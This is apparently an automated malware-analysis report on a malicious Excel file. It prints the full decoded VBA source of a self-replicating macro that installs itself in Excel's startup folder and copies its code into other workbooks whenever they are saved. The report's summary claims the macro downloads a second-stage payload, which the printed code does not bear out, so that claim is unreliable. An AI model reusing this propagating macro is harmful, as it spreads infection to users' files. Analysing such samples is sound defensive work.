MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample is a malicious Excel file containing a Workbook_Open VBA macro. This macro attempts to download and execute a second-stage payload named '0KILLBASE.XLS' from the startup path. It also checks for and potentially creates an entry for 'BASE5874.XLS' in the startup path, indicating an attempt to establish persistence.
Heuristics 3
-
ClamAV: Xls.Trojan.AnitiDivi-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Trojan.AnitiDivi-2
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2897 bytes |
SHA-256: 38af40163a323d702e588502d6103028d3e9cb524d456a2ad9d432290d466994 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private WithEvents mapp As Application
Attribute mapp.VB_VarHelpID = -1
Private Const cstrKillEngine As String = "0KILLBASE.XLS"
Private Sub Workbook_Open()
Dim BaseName As String
Dim myName As String
Dim wbkKillEngine As Workbook
Dim strKillEngine As String
BaseName = Application.StartupPath + "\BASE5874.XLS"
If Len(Dir(BaseName)) <> 0 Then
Set x = Application.Workbooks.Open(BaseName)
x.Close
Kill BaseName
MsgBox "祇瞷<BASE5874>痜瑀,�w睲埃!!", vbInformation, "ㄓ��0KillBase�捍%�"
End If
strKillEngine = UCase$(Application.StartupPath + "\" + cstrKillEngine)
If UCase$(Me.FullName) = strKillEngine Then
If Len(Dir(Application.StartupPath, vbDirectory)) = 0 Then MkDir Application.StartupPath
Set mapp = Application
ElseIf Len(Dir(strKillEngine)) = 0 Then
Application.ScreenUpdating = False
Set wbkKillEngine = Workbooks.Add
wbkKillEngine.IsAddin = True
Intrude wbkKillEngine
wbkKillEngine.SaveAs strKillEngine, xlAddIn
wbkKillEngine.Close
Application.ScreenUpdating = True
End If
End Sub
Private Sub mapp_WorkbookOpen(ByVal Wb As Workbook)
Dim cmdTarget As Object
On Error Resume Next
Set cmdTarget = Wb.VBProject.VBComponents("ThisWorkbook").CodeModule
If cmdTarget.Find("Private Const cstrEngine As String =", 1, 1, 20, 41) Then
cmdTarget.DeleteLines 1, cmdTarget.CountOfLines
Wb.Save
MsgBox "祇瞷<BASE5874>痜瑀,�w睲埃!!", vbInformation, "ㄓ��0KillBase�捍%�"
End If
End Sub
Private Function Intrude(wbkTarget As Workbook) As Boolean
Dim cmdSource As Object
Dim cmdTarget As Object
On Error Resume Next
Intrude = False
Set cmdSource = Me.VBProject.VBComponents("ThisWorkbook").CodeModule
Set cmdTarget = wbkTarget.VBProject.VBComponents("ThisWorkbook").CodeModule
If cmdTarget.CountOfLines <= 2 Then
cmdTarget.DeleteLines 1, cmdSource.CountOfLines
cmdTarget.AddFromString cmdSource.Lines(1, cmdSource.CountOfLines)
Intrude = True
End If
End Function
Private Sub mapp_WorkbookBeforeSave(ByVal Wb As Excel.Workbook, ByVal SaveAsUI As Boolean, Cancel As Boolean)
On Error Resume Next
Intrude Wb
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.